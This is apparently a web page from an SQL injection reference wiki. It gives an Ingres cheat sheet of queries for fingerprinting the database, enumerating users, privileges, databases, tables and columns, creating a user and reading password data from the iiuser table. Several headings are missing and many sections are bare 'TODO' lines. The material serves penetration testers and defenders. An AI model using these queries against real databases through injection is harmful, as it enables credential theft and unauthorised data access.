The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

Ingres SQL Injection Cheat Sheet

  • SELECT dbmsinfo('_version');

  • SELECT 123; -- comment
  • SELECT 123; /* comment */

  • SELECT dbmsinfo('session_user');
  • SELECT dbmsinfo('system_user');

First connect to iidbdb, then:

  • SELECT name, password FROM iiuser;
  • SELECT own FROM iidatabase;

  • CREATE USER testuser WITH password = 'testuser'; -- priv

First connect to iidbdb, then:

  • SELECT name, password FROM iiuser;

  • SELECT dbmsinfo('db_admin');
  • SELECT dbmsinfo('create_table');
  • SELECT dbmsinfo('create_procedure');
  • SELECT dbmsinfo('security_priv');
  • SELECT dbmsinfo('select_syscat');
  • SELECT dbmsinfo('db_privileges');
  • SELECT dbmsinfo('current_priv_mask');

TODO

  • SELECT dbmsinfo('database');

  • SELECT name FROM iidatabase; -- connect to iidbdb

  • SELECT column_name, column_datatype, table_name, table_owner FROM iicolumns;

  • SELECT table_name, table_owner FROM iitables;
  • SELECT relid, relowner, relloc FROM iirelation;
  • SELECT relid, relowner, relloc FROM iirelation WHERE relowner != '$ingres';

  • SELECT table_name, table_owner FROM iicolumns WHERE column_name = 'value';

TODO

  • SELECT substr('abc', 2, 1); -- returns 'b'

The function “bit_and” exists, but seems hard to use.

Here’s an example of ANDing 3 and 5 together. The result is a “byte” type with value \001:

  • SELECT SUBSTR(BIT_AND(CAST(3 as byte), CAST(5 as byte)),1,1);

TODO

TODO

  • SELECT CAST(123 as varchar);
  • SELECT CAST('123' as integer);

  • SELECT 'abc' || 'def';

TODO

TODO

TODO

TODO

TODO

TODO

TODO

  • SELECT dbmsinfo('ima_server');

  • SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = 'value'; -- primary location of db
  • SELECT lname FROM iiextend WHERE dname = 'value'; -- extended location of db
  • SELECT area FROM iilocations WHERE lname = 'value'; -- all areas (i.e. directories) linked with a location

  • SELECT name FROM iidatabase WHERE own = '$ingres'; -- connect to iidbdb

The Ingres database can be downloaded for free from http://esd.ingres.com.
